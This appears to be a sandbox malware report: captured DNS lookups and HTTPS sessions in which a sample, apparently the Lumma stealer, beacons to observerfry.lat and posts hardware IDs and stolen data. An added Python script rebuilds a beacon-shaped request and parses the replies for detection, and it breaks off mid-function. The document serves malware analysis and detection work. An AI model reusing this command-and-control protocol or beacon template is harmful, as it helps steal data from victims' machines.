Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 17:20:54.893101931 CET | 60772 | 53 | 192.168.2.9 | 1.1.1.1
Dec 23, 2024 17:20:55.034312010 CET | 53 | 60772 | 1.1.1.1 | 192.168.2.9
Dec 23, 2024 17:21:17.808382034 CET | 53869 | 53 | 192.168.2.9 | 1.1.1.1
Dec 23, 2024 17:21:17.947547913 CET | 53 | 53869 | 1.1.1.1 | 192.168.2.9
Dec 23, 2024 17:21:20.240093946 CET | 59741 | 53 | 192.168.2.9 | 1.1.1.1
Dec 23, 2024 17:21:20.594074965 CET | 53 | 59741 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 17:20:54.893101931 CET | 192.168.2.9 | 1.1.1.1 | 0x4faf | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:17.808382034 CET | 192.168.2.9 | 1.1.1.1 | 0x5205 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.240093946 CET | 192.168.2.9 | 1.1.1.1 | 0x7bac | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 17:20:49.348419905 CET | 1.1.1.1 | 192.168.2.9 | 0x9e6d | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 17:20:49.348419905 CET | 1.1.1.1 | 192.168.2.9 | 0x9e6d | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:20:55.034312010 CET | 1.1.1.1 | 192.168.2.9 | 0x4faf | No error (0) | observerfry.lat | | 104.21.36.201 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:20:55.034312010 CET | 1.1.1.1 | 192.168.2.9 | 0x4faf | No error (0) | observerfry.lat | | 172.67.199.72 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:17.947547913 CET | 1.1.1.1 | 192.168.2.9 | 0x5205 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:17.947547913 CET | 1.1.1.1 | 192.168.2.9 | 0x5205 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:17.947547913 CET | 1.1.1.1 | 192.168.2.9 | 0x5205 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.75.84 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.196.113 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.131.161 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.167.225 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.36.241 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.79 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.243 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 17:21:20.594074965 CET | 1.1.1.1 | 192.168.2.9 | 0x7bac | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.114 | A (IP address) | IN (0x0001) | false
                                                                                                                                          • observerfry.lat
                                                                                                                                          • bitbucket.org
                                                                                                                                          • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49717 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:20:56 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: observerfry.lat
2024-12-23 16:20:56 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 16:20:56 UTC | 1119 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 23 Dec 2024 16:20:56 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=qmi9ctlnnv5nmrs2vc3v7l44lu; expires=Fri, 18 Apr 2025 10:07:35 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mXTWTBRXnuXAKo1p9IMnenqCPUtoSb47iOZVXyOg0HieLijjltVz47aNZStKtnstaBKFUFeArYOSgj6dHmOt6qDx%2FF37z8ZehQ8AchGiGTNi9fM5KLdyNLHMXT86VD6SQ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f69ae8d5b72438c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1609&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1613259&cwnd=245&unsent_bytes=0&cid=0c45ab6d08ea339b&ts=742&x=0"
2024-12-23 16:20:56 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 16:20:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49723 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:20:58 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 53
                                                                                                                                          Host: observerfry.lat
2024-12-23 16:20:58 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 16:20:59 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 23 Dec 2024 16:20:59 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=8hhp30rkncg6op416rqjvs5ut1; expires=Fri, 18 Apr 2025 10:07:38 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CXFIljIsKTHfTcfOsSPxgoiWBd2ClK131YgwaqfsaP8bwDyYjXPP67VchVdykXr60FlxKZpBDRHPYdfphJRwsGlLW9uItax2Z%2FaLjSVrWZgR5OxveComd%2FQxrinyAoLD4pY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f69ae9bf91ef5f7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1601&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1769696&cwnd=237&unsent_bytes=0&cid=c0cc70586de55251&ts=1428&x=0"
                                                                                                                                          Data Ascii: N76XsU0rFCIy9UrM+10nSx+6E3Q9dAcxEuc/UFAHltkPb66tbHIYEsb1Gpwf/c5PpyqTgS1cmmUjNx4RdM6jyQ6rl7QMEjgrEulnpWLkwhZS6yYpbZG+VSu+AzB525exDvOWsQE7MQoeoS+4+10XQxuiIyh50H7If+s6aSy60vk2kqqsbZZ4MxIEG6RipOp706pDUDm0wwS33x5VaKLLxQ6rl7QMEjArEulnpWLkwhZS6yYpbZG+VSu+AzB525e
                                                                                                                                          2024-12-23 16:20:59 UTC1369INData Raw: 37 46 56 66 6e 67 72 45 73 67 6a 78 51 4f 68 6f 7a 73 7a 6d 6d 5a 59 4f 59 53 62 4d 52 4c 6e 4f 31 42 52 34 70 50 51 54 36 61 72 73 44 31 72 51 53 73 53 68 42 72 42 41 2f 79 4b 47 6b 71 66 65 79 45 6b 6a 59 63 73 4a 36 39 4b 53 54 79 36 6d 75 54 33 61 69 50 6c 45 54 4e 30 47 74 62 4e 4d 76 78 58 71 63 74 6e 2f 31 37 50 49 44 6d 73 69 7a 6a 76 76 77 35 52 43 50 2b 57 77 51 2f 7a 6c 73 77 4e 78 7a 45 4f 55 76 51 6a 6e 51 4f 55 69 68 6f 48 6b 6a 4e 30 5a 65 47 32 4c 45 50 36 41 69 77 49 68 35 65 68 44 76 50 61 6c 41 30 36 65 48 4d 54 35 52 71 51 42 36 6d 7a 64 30 2f 75 59 32 52 39 34 5a 72 49 30 31 4e 4b 54 58 44 76 6e 7a 77 37 67 73 2f 35 41 54 4e 6c 36 75 70 4e 61 72 68 44 71 49 50 4c 47 35 4a 4c 6b 4e 30 77 77 69 78 71 37 35 70 64 61 4f 2b 57 77 51 2f 7a
                                                                                                                                          Data Ascii: 7FVfngrEsgjxQOhozszmmZYOYSbMRLnO1BR4pPQT6arsD1rQSsShBrBA/yKGkqfeyEkjYcsJ69KSTy6muT3aiPlETN0GtbNMvxXqctn/17PIDmsizjvvw5RCP+WwQ/zlswNxzEOUvQjnQOUihoHkjN0ZeG2LEP6AiwIh5ehDvPalA06eHMT5RqQB6mzd0/uY2R94ZrI01NKTXDvnzw7gs/5ATNl6upNarhDqIPLG5JLkN0wwixq75pdaO+WwQ/z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49729 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:01 UTC | 272 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=E2DQ77VNG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12797
    Host: observerfry.lat
2024-12-23 16:21:01 UTC | 12797 | OUT | Data Raw: 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e
    Data Ascii: --E2DQ77VNGContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--E2DQ77VNGContent-Disposition: form-data; name="pid"2--E2DQ77VNGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--E2DQ77VNGConten
2024-12-23 16:21:02 UTC | 1122 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 16:21:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=jfjo2t70odt83aiv5nq8euk5lq; expires=Fri, 18 Apr 2025 10:07:40 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSxPZCqF0UX7ZIWCfcoSUfwjjetmHMqAZDuXkdwJvNWBzCMhjkYOBbdo6g9CQClGJ3ueENnBzqWbx1bW1YaVyy3A6sHgoTYFbzlTJ9FaflFQarb8d1qBEsmzvao6ds4g1FM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f69aeac6ed67295-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2163&min_rtt=2140&rtt_var=819&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13727&delivery_rate=1364485&cwnd=206&unsent_bytes=0&cid=041b9215ca65f227&ts=1007&x=0"
2024-12-23 16:21:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 16:21:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49735 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:03 UTC | 272 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=IM0Z09FOG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15015
    Host: observerfry.lat
2024-12-23 16:21:03 UTC | 15015 | OUT | Data Raw: 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e
    Data Ascii: --IM0Z09FOGContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--IM0Z09FOGContent-Disposition: form-data; name="pid"2--IM0Z09FOGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--IM0Z09FOGConten
2024-12-23 16:21:04 UTC | 1131 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 16:21:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=l1dgcne2ghd4pekamvhs9b0gsb; expires=Fri, 18 Apr 2025 10:07:43 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSdHLYAG%2FP%2BBp7aqu5SAHcMSz7LYp0aj2w%2BRKrylvhDi9b6NOqb0yOG66UBsvsHpUZzK18kQ0cx9fJsoYF1yamdiepZS3fI6Ydlvz6eB1qGHYpDwPonLCPN93dnakB%2B%2Ffwk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f69aebb2b6c0fa1-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1668&rtt_var=851&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15945&delivery_rate=1135303&cwnd=252&unsent_bytes=0&cid=be67c246110055bb&ts=983&x=0"
2024-12-23 16:21:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 16:21:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49741 | 104.21.36.201 | 443 | 7832 | C:\Users\user\Desktop\OtHVIQ2ge4.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:21:06 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ICQWIJFXDT77D23LZB4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20591
    Host: observerfry.lat
2024-12-23 16:21:06 UTC | 15331 | OUT | Data Raw: 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
    Data Ascii: --ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="pid"3--ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="lid"LOGS11--Li
2024-12-23 16:21:06 UTC | 5260 | OUT | Data Raw: 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00
    Data Ascii: =QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
2024-12-23 16:21:07 UTC | 1131 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 16:21:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=k3sb65ehrksnvh6mrj2ticungo; expires=Fri, 18 Apr 2025 10:07:46 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9SFVgVLf5GTEhJ4qO%2Fwr7WWBzAIQPrym5XlTU48PGdWlsDYFVSBmzQQNeuKdKtKvsRJzr0%2FQNj%2B22VrifvRs7hT7uosr%2FI6tKc%2BqJoM7lQ4Sveb7RHZ6Sz5rw2dria1oDc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f69aecc7ac10f6b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1623&rtt_var=639&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21553&delivery_rate=1673352&cwnd=210&unsent_bytes=0&cid=6d073e6b463dbd7b&ts=963&x=0"
2024-12-23 16:21:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 16:21:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
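Sessions 2 to 4 are one exchange repeated: a multipart POST to /api carrying the fields hwid, pid and lid (session 4 raises pid to 3 and appends a binary part), answered with a chunked body whose only content is `ok 8.46.123.189`. The `fok` in the Data Ascii rendering is not a word: the sandbox drops CRLFs, so the chunk-size line `f` (hex for 15, the length of `ok 8.46.123.189`) is fused onto the payload. The Python below is an added example and is not part of the Joe Sandbox report nor code from the malware. It rebuilds a request of the observed shape from the visible fields of session 2 (only the three visible parts; the remainder of the 12797-byte stolen-data body is not reproduced), decodes the reply using the bytes copied from the capture, and names the traits a detection could key on. The indicator names (`post_api`, `hwid_pid_lid_fields`, `hwid_32hex`, `ok_ip_reply`) and the 32-uppercase-hex check on hwid are assumptions drawn from this single sample, not a documented protocol.

```python
import re

# Constructed input, modelled on session 2 of the capture above. Only the
# three form fields that are visible in the capture are reproduced; the real
# body continued for 12797 bytes with exfiltrated data that is not shown.
BOUNDARY = "E2DQ77VNG"


def build_request(hwid: str, pid: str, lid: str, boundary: str = BOUNDARY) -> bytes:
    """Assemble a request shaped like the observed beacon so the parser has input."""
    parts = "".join(
        f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n{value}\r\n"
        for name, value in (("hwid", hwid), ("pid", pid), ("lid", lid))
    )
    body = (parts + f"--{boundary}--\r\n").encode()
    head = (
        "POST /api HTTP/1.1\r\n"
        "Connection: Keep-Alive\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Host: observerfry.lat\r\n\r\n"
    ).encode()
    return head + body


# Reply to session 2: the two IN rows, copied byte-for-byte from the Data Raw
# columns above (only the headers that matter for decoding are kept).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
    + bytes.fromhex("66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a")
    + bytes.fromhex("30 0d 0a 0d 0a")
)


def split_message(raw: bytes):
    """Split an HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body."""
    fields = {}
    delimiter = b"--" + boundary.encode()
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if part_body.endswith(b"\r\n"):     # CRLF that precedes the next delimiter
            part_body = part_body[:-2]
        m = re.search(rb'name="([^"]+)"', part_head)
        if m:
            fields[m.group(1).decode()] = part_body
    return fields


def decode_chunked(body: bytes) -> bytes:
    """Decode Transfer-Encoding: chunked. For the captured reply the first
    size line is 'f' (15), which is why the ASCII column reads 'fok ...'."""
    out = bytearray()
    pos = 0
    try:
        while True:
            nl = body.index(b"\r\n", pos)
            size = int(body[pos:nl].split(b";")[0], 16)   # ignore chunk extensions
            if size == 0:
                break
            out += body[nl + 2 : nl + 2 + size]
            pos = nl + 2 + size + 2                         # skip data and its CRLF
    except ValueError:
        pass                                                # truncated stream: keep what we have
    return bytes(out)


OK_REPLY = re.compile(rb"^ok (?:\d{1,3}\.){3}\d{1,3}$")


def lumma_indicators(request: bytes, response: bytes) -> list:
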